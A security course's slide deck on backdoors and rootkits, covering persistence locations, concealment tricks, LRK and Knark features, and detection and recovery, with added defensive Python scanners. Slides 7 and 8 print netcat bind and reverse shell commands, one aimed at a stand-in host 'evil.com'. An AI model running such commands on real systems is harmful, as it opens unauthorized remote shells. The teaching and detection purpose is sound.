CIT 380: Securing Computer Systems: Backdoors and Rootkits

Slide #1: Backdoors and Rootkits

Slide #2: Topics

Backdoors
- Backdoor types
- Netcat backdoors
- Reverse telnet
- Concealing backdoors

Rootkits
- User-mode rootkits
- Kernel rootkits
- Detecting rootkits
- Recovery from a rootkit

Slide #3: Types of Backdoors

- Local privilege escalation
- Remote command execution
- Remote shell access
- Remote GUI control

Slide #4: Starting Backdoors on UNIX

- /etc/inittab
- Startup scripts
  - /etc/rc.d and /etc/init.d scripts
  - Add a new script.
  - Modify an existing script.
- inetd
  - Add a new service to /etc/inetd.conf
- User startup scripts
  - .bashrc, .login, .cshrc, .xinitrc, .xsession, etc.
- cron

Slide #5: Starting Backdoors on Windows

- Autostart folders
  - C:\Documents and Settings\[user]\Start Menu\Programs\Startup
- Startup scripts
  - C:\Windows\win.ini, System.ini, Wininit.ini, etc.
- Registry keys
  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Many others.
- Task Scheduler

Slide #6: Finding Backdoor Scripts

- Manual scan
  - Time-consuming and error prone.
- Automatic
  - UNIX: chkrootkit, Titan
  - Windows: Autorun from
- File integrity check
  - HIDS like Tripwire or Osiris

Slide #7: Netcat Backdoors

  # nc -l -p 2222 -e /bin/sh     (server on victim)
  $ nc victim.org 2222           (client on attacker host)

[Diagram: Netcat client (stdin/stdout) on the attacker host connected across the network to the Netcat server (stdin/stdout) on the victim.]

Slide #8: Reverse Backdoors

- What if the firewall blocks port 2222?
- What if the firewall blocks all incoming connections to victim.org?
- Solution:
  - Run the listener on the attacker host (evil.com):
      nc -l -p 80
  - Run the client with a shell on the victim host:
      nc evil.com 80 -e /bin/sh

Slide #9: Defenses against Backdoors

- Detection
  - Port scans, e.g., nmap
- Prevention
  - Firewall on the local host.
  - Use a proxying firewall instead of a packet filter.

Slide #10: Concealing Backdoors

- Encryption
  - Pipe through an encryption program.
  - Use cryptcat or socat.
- Backdoors without ports
  - ICMP backdoors: Loki, ICMP tunnel.
  - Sniffing backdoors.

Slide #11: Non-promiscuous Sniffers

- cd00r listens for all traffic to the victim host.
  - Waits for the appropriate port-knock sequence.
  - After the port knock it can:
    - Open a TCP shell port.
    - Reverse telnet a shell to the attacker host.
    - Sniff commands off the wire.

Slide #12: Promiscuous Sniffing Backdoors

1. Install the sniffing backdoor on the victim host.
2. Send backdoor commands to the sucker host.
3. The backdoor sniffs the packets.
4. The backdoor responds with packets forged to be from the sucker host.

Slide #13: Promiscuous Sniffing Backdoors

[Diagram: the attacker host sends commands across the Internet and through the firewall to the sucker host; the victim host on the same segment sniffs them and replies with packets spoofed from the sucker host.]

Slide #14: What is a rootkit?

Collection of attacker tools installed after an intruder has gained access:
- Log cleaners
- File/process/user hiding tools
- Network sniffers
- Backdoor programs

Slide #15: Rootkit Goals

1. Remove evidence of the original attack and of the activity that led to rootkit installation.
2. Hide future attacker activity (files, network connections, processes) and prevent it from being logged.
3. Enable future access to the system by the attacker.
4. Install tools to widen the scope of penetration.
5. Secure the system so other attackers can't take control of it from the original attacker.

Slide #16: Concealment Techniques

- Remove log and audit file entries.
- Modify system programs to hide attacker files, network connections, and processes.
- Modify the logging system to not log attacker activities.
- Modify OS kernel system calls to hide attacker activities.

Slide #17: Installation Concealment

- Use a subdirectory of a busy system directory like /dev, /etc, /lib, or /usr/lib.
- Use dot files, which aren't in ls output.
- Use spaces to make filenames look like expected dot files: ". " and ".. "
- Use filenames that the system might use:
  - /dev/hdd (if no 4th IDE disk exists)
  - /usr/lib/libX.a (libX11 is real Sun X-Windows)
- Delete the rootkit install directory once installation is complete.
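Every trick on this slide leaves a testable artifact: a name that is "." or ".." plus whitespace, a dot entry where none belongs, or a regular file posing as a device node. The scanner below is an added example, not lecture material; it walks a tree and flags those artifacts, with a constructed temp tree standing in for the system directories named on the slide (on a real host you would run it against / and adjust SYSTEM_DIRS).

```python
import os
import stat
import tempfile

# Directories where dot entries and stray regular files are not expected.
# Relative to the scanned root; on a live host these map to /dev, /etc, /lib, /usr/lib.
SYSTEM_DIRS = ("dev", "etc", "lib", "usr/lib")

def name_reasons(name):
    """Why a single file or directory name looks like concealment."""
    reasons = []
    stripped = name.rstrip()
    if stripped in (".", "..") and stripped != name:
        reasons.append("dot-space name mimicking . or ..")
    elif stripped != name:
        reasons.append("trailing whitespace in name")
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        reasons.append("control character in name")
    return reasons

def find_concealed(root):
    """Walk root and return sorted (relative path, reason) pairs for suspicious entries."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        in_system = any(rel_dir == d or rel_dir.startswith(d + "/") for d in SYSTEM_DIRS)
        is_dev = rel_dir == "dev" or rel_dir.startswith("dev/")
        for name in dirnames + filenames:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            for reason in name_reasons(name):
                findings.append((rel, reason))
            if in_system and name.startswith("."):
                findings.append((rel, "hidden entry in system directory"))
            # /dev should hold device nodes, symlinks and directories, not plain files like a fake /dev/hdd.
            if is_dev and stat.S_ISREG(os.lstat(os.path.join(dirpath, name)).st_mode):
                findings.append((rel, "regular file in device directory"))
    return sorted(findings)

def build_sample_tree():
    """Constructed tree reproducing the slide's tricks; returns its root directory."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "dev", ". "))        # dot-space directory
    os.makedirs(os.path.join(root, "etc", "..  "))      # dot-dot plus two spaces
    os.makedirs(os.path.join(root, "lib", ".rk"))       # hidden directory in a library dir
    os.makedirs(os.path.join(root, "home", ".ssh"))     # hidden, but expected in a home dir
    open(os.path.join(root, "dev", "hdd"), "w").close()   # fake device: a regular file
    open(os.path.join(root, "etc", "passwd"), "w").close()
    return root

if __name__ == "__main__":
    for path, why in find_concealed(build_sample_tree()):
        print(repr(path), why)
```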

Slide #18: Attack Tools

- Network sniffer
  - Including a password grabber utility
- Password cracker
- Vulnerability scanners
- Autorooter
  - Automatically applies exploits to host ranges
- DDoS tools

Slide #19: History of Rootkits

- 1989: Phrack 25 "Black Tie Affair": wtmp wiping.
- 1994: Advisory CA about SunOS rootkits.
- 1996: Linux rootkits (lrk3 released).
- 1997: Phrack 51 halflife article: LKM-based rootkits.
- 1998: Silvio Cesare's kernel patching via kmem.
- 1999: Greg Hoglund's NT kernel rootkit paper.
- 2005: Sony ships CDs with rootkits that hide DRM and spyware that auto-installs when the CD is played.
- 2006: SubVirt rootkit moves the real OS into a VM.

Slide #20: Rootkit Types

- User-mode rootkits
  - Binary rootkits replace user programs.
    - Trojans: ls, netstat, ps
    - Trojan backdoors: login, sshd
  - Library rootkits replace system libraries.
    - Intercept library calls to hide activities and add backdoors.
- Kernel rootkits
  - Modify system calls/structures that all user-mode programs rely on to list users, processes, and sockets.
  - Add backdoors to the kernel itself.

Slide #21: Binary Rootkits

- Install trojan-horse versions of common system commands, such as ls, netstat, and ps, to hide attacker activities.
- Install programs to edit attacker activity out of log and accounting files.
- Install trojan-horse variants of common programs like login, passwd, and sshd to allow the attacker continued access to the system.
- Install network sniffers.

Slide #22: Linux Root Kit (LRK) v4 Features

  chsh        Trojaned! User->r00t
  crontab     Trojaned! Hidden crontab entries
  du          Trojaned! Hide files
  fix         File fixer!
  ifconfig    Trojaned! Hide sniffing
  inetd       Trojaned! Remote access
  linsniffer  Packet sniffer!
  login       Trojaned! Remote access
  ls          Trojaned! Hide files
  netstat     Trojaned! Hide connections
  passwd      Trojaned! User->r00t
  ps          Trojaned! Hide processes
  rshd        Trojaned! Remote access
  sniffchk    Program to check if sniffer is up and running
  syslogd     Trojaned! Hide logs
  tcpd        Trojaned! Hide connections, avoid denies
  top         Trojaned! Hide processes
  wted        wtmp/utmp editor!
  z2          Zap2 utmp/wtmp/lastlog eraser!

Slide #23: Linux Root Kit (LRK) v4 Trojans

- ifconfig: Doesn't display the PROMISC flag when sniffing.
- login: Allows login to any account with the rootkit password. If root login is refused on your terminal, log in as "rewt". Disables history logging when the backdoor is used.
- ls: Hides files listed in /dev/ptyr. All files are shown with 'ls -/' if SHOWFLAG is enabled.
- passwd: Enter your rootkit password instead of the old password to become root.
- ps: Hides processes listed in /dev/ptyp.
- rshd: Execute remote commands as root: rsh -l rootkitpassword host command
- syslogd: Removes log entries matching strings listed in /dev/ptys.

Slide #24: Binary Rootkit Detection

- Use non-trojaned programs
  - ptree is generally uncompromised.
  - tar will archive hidden files; then list the archive with -t.
  - lsof is also generally safe.
  - Use known good tools from CD-ROM.
- File integrity checks
  - tripwire, AIDE, Osiris
  - rpm -V -a
  - Must have a known valid version of the database offline, or the attacker may modify file signatures to match the Trojans.
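The last bullet is the part of integrity checking that most home-grown scripts get wrong: a hash database stored on the monitored host can simply be rewritten to match the trojans. The added example below (not lecture code, and not how tripwire or AIDE store their databases) builds a baseline, seals it with an HMAC under a key that is assumed to live off the host, and refuses to use a baseline whose seal no longer verifies; the files and the key are constructed.

```python
import hashlib
import hmac
import json
import os
import tempfile

def hash_file(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root):
    """Map every regular file under root (path relative to root) to its SHA-256."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline

def seal_baseline(baseline, key):
    """Serialize the baseline and HMAC it with a key that never lives on the monitored host."""
    body = json.dumps(baseline, sort_keys=True).encode()
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()

def load_sealed(body, tag, key):
    """Return the baseline only if its HMAC verifies, else None (tampered or wrong key)."""
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return json.loads(body) if hmac.compare_digest(expected, tag) else None

def compare_to_baseline(baseline, root):
    """Report files whose hash changed, files not in the baseline, and files that vanished."""
    current = build_baseline(root)
    return {
        "changed": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(set(current) - set(baseline)),
        "missing": sorted(set(baseline) - set(current)),
    }

def demo():
    """Constructed scenario: seal a baseline, then trojan ls, drop a hidden file, delete motd."""
    root = tempfile.mkdtemp()
    def write(rel, data):
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    write("bin/ls", b"original ls")
    write("bin/ps", b"original ps")
    write("etc/motd", b"welcome")
    key = b"offline-key"              # assumption: kept on read-only media, not on the host
    body, tag = seal_baseline(build_baseline(root), key)
    write("bin/ls", b"trojaned ls")   # attacker replaces a binary
    write("lib/.rk", b"rootkit")      # attacker adds a hidden file
    os.remove(os.path.join(root, "etc/motd"))
    report = compare_to_baseline(load_sealed(body, tag, key), root)
    forged = load_sealed(bytes([body[0] ^ 1]) + body[1:], tag, key)  # edited baseline fails
    return report, forged
```

The seal only helps if the checker itself and its hash library are run from known-good media too; a kernel rootkit that redirects reads (slide 26) defeats any check run on the live system.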

Slide #25: Library Rootkits

- The t0rn rootkit uses a special system library, libproc.a, to intercept process information requested by user utilities.
- Modify libc
  - Intercept system call data returning from the kernel, stripping out evidence of attacker activities.
  - Alternately, ensure that the rootkit library providing system calls is called instead of libc by placing it in /etc/ld.so.preload.

Slide #26: Kernel Rootkits

- The kernel runs in supervisor processor mode
  - Complete control over the machine.
- Rootkits modify kernel system calls
  - execve modified to run a Trojan horse binary for some programs, while other system calls used by integrity checkers read the original binary file.
  - setuid modified to give root to a certain user.
- Advantage: stealth
  - Runtime integrity checkers cannot see rootkit changes.
  - All programs are impacted by the kernel Trojan horse.
  - Open backdoors/sniff the network without running processes.

Slide #27: Types of Kernel Rootkits

- Loadable kernel modules
  - Device drivers are LKMs.
  - Can be defeated by disabling LKMs.
  - ex: Adore, Knark
- Alter the running kernel in memory.
  - Modify /dev/kmem directly.
  - ex: SucKit
- Alter the kernel on disk.

Slide #28: Kernel Rootkit Detection

- List kernel modules
  - lsmod
  - cat /proc/modules
- Examine kernel symbols (/proc/ksyms)
  - Module name listed in [] after the symbol name.
- Check system call addresses
  - Compare running kernel syscall addresses with those listed in System.map, generated at kernel compile.
- All of these signatures can be hidden/forged.
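The System.map comparison on this slide, written out as an added example (not from the lecture) in the symbol-table format of /proc/kallsyms, the successor of /proc/ksyms. It goes one step beyond the slide: modern kernels are loaded at a randomized offset (KASLR), so the check first derives that offset from an anchor symbol and compares relative addresses. The two symbol tables are constructed, the `sys_` names follow the slide's era, and the `knark` module tag is illustrative.

```python
import re

# Constructed System.map (link-time addresses) and /proc/kallsyms (running kernel);
# not from a real kernel. The running kernel sits 0x1000000 above its link address,
# and sys_getdents64 has been redirected into memory owned by a module.
SYSTEM_MAP = """\
ffffffff81000000 T _text
ffffffff81234560 T sys_read
ffffffff81234600 T sys_write
ffffffff81300000 T sys_getdents64
"""
KALLSYMS = """\
ffffffff82000000 T _text
ffffffff82234560 T sys_read
ffffffff82234600 T sys_write
ffffffffc0001000 t sys_getdents64 [knark]
ffffffffc0000000 t hook_getdents [knark]
"""
LINE_RE = re.compile(r"^([0-9a-f]+)\s+(\S)\s+(\S+)(?:\s+\[(\S+)\])?$")

def parse_symbols(text):
    """Return {name: (address, module or None)} for text-segment symbols (type T/t)."""
    syms = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group(2) in "Tt":
            syms[m.group(3)] = (int(m.group(1), 16), m.group(4))
    return syms

def kernel_slide(system_map, kallsyms, anchor="_text"):
    """KASLR offset: how far the anchor symbol moved between System.map and the running kernel."""
    return parse_symbols(kallsyms)[anchor][0] - parse_symbols(system_map)[anchor][0]

def check_syscalls(system_map, kallsyms, anchor="_text"):
    """List sys_* symbols whose live address is not System.map address + slide."""
    ref = parse_symbols(system_map)
    live = parse_symbols(kallsyms)
    slide = live[anchor][0] - ref[anchor][0]
    mismatches = []
    for name, (addr, _) in ref.items():
        if not name.startswith("sys_"):
            continue
        if name not in live:
            mismatches.append((name, "missing from running kernel"))
            continue
        live_addr, module = live[name]
        if live_addr != addr + slide:
            where = f"module {module}" if module else "kernel text"
            mismatches.append((name, f"expected {addr + slide:#x}, found {live_addr:#x} in {where}"))
    return mismatches

if __name__ == "__main__":
    print(f"KASLR slide: {kernel_slide(SYSTEM_MAP, KALLSYMS):#x}")
    for name, why in check_syscalls(SYSTEM_MAP, KALLSYMS):
        print(name, why)
```

Reading real addresses from /proc/kallsyms requires root (otherwise they read as zero), and the slide's closing caveat still applies: a kernel rootkit can feed this check whatever it likes.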

Slide #29: Knark

- Linux-based LKM rootkit
- Features
  - Hide/unhide files or directories
  - Hide TCP or UDP connections
  - Execution redirection
  - Unauthenticated privilege escalation
  - Utility to change the UID/GID of a running process
  - Unauthenticated, privileged remote execution daemon
  - kill -31 to hide a running process
- modhide: assistant LKM that hides Knark from module listing attempts.

Slide #30: Rootkit Detection

- Offline system examination
  - Mount and examine the disk using another OS kernel and image.
  - Knoppix: live CD Linux distribution.
- Computer forensics
  - Examine the disk below the filesystem level.
  - Helix: live CD Linux forensics tool.

Slide #31: Rootkit Detection Utilities

- chkrootkit
  - Detects >50 rootkits on multiple UNIX types.
  - Checks commonly trojaned binaries.
  - Examines log files for modifications.
  - Checks for LKM rootkits.
  - Use the -p option to use known safe binaries from CD-ROM.
- carbonite
  - LKM that searches for rootkits in the kernel.
  - Generates and searches a frozen image of kernel process structures.

Slide #32: Detection Countermeasures

- Hide the rootkit in unused sectors or in unused fragments of used sectors.
- Install the rootkit into flash memory like the PC BIOS, ensuring that it persists even after disk formatting and OS re-installation.

Slide #33: Rootkit Recovery

- Restore compromised programs from backup
  - Lose evidence of the intrusion.
  - Did you find all the trojans?
- Back up the system, then restore from tape
  - Save an image of the hard disk for investigation.
  - Restore a known safe image to be sure that all trojans have been eliminated.
  - Patch the system to repair the exploited vulnerability.

Slide #34: Key Points

- Backdoors allow the intruder into the system without using the exploit again.
- Rootkits automatically and deeply compromise a system once root access is attained.
- Rootkits are easy to use, difficult to detect.
- Don't trust anything on a compromised system: access the disk from a known safe system, like a Knoppix CD.
- Recovery requires a full re-installation of the OS and restoration of files from a known good backup.

Slide #35: References

1. Oktay Altunergil, "Scanning for Rootkits."
2. Silvio Cesare, "Runtime kernel kmem patching."
3. William Cheswick, Steven Bellovin, and Aviel Rubin, Firewalls and Internet Security, 2nd edition.
4. Anton Chuvakin, "An Overview of UNIX Rootkits," iDEFENSE whitepaper.
5. Dave Dittrich, "Rootkits FAQ."
6. Greg Hoglund and Gary McGraw, Exploiting Software: How to Break Code, Addison-Wesley.
7. Samuel T. King et al., "SubVirt: Implementing malware with virtual machines."
8. Stuart McClure, Joel Scambray, and George Kurtz, Hacking Exposed, 3rd edition, McGraw-Hill.
9. Cyrus Peikari and Anton Chuvakin, Security Warrior, O'Reilly & Associates.
10. pragmatic, (nearly) Complete Loadable Linux Kernel Modules.
11. Mark Russinovich, "Sony, Rootkits and Digital Rights Management Gone Too Far."
12. Jennifer Rutkowska, "Red Pill: or how to detect VMM using (almost) one CPU instruction."
13. Ed Skoudis, Counter Hack Reloaded, Prentice Hall.
14. Ed Skoudis and Lenny Zeltser, Malware: Fighting Malicious Code, Prentice Hall.
15. Rainer Wichmann, "Linux Kernel Rootkits."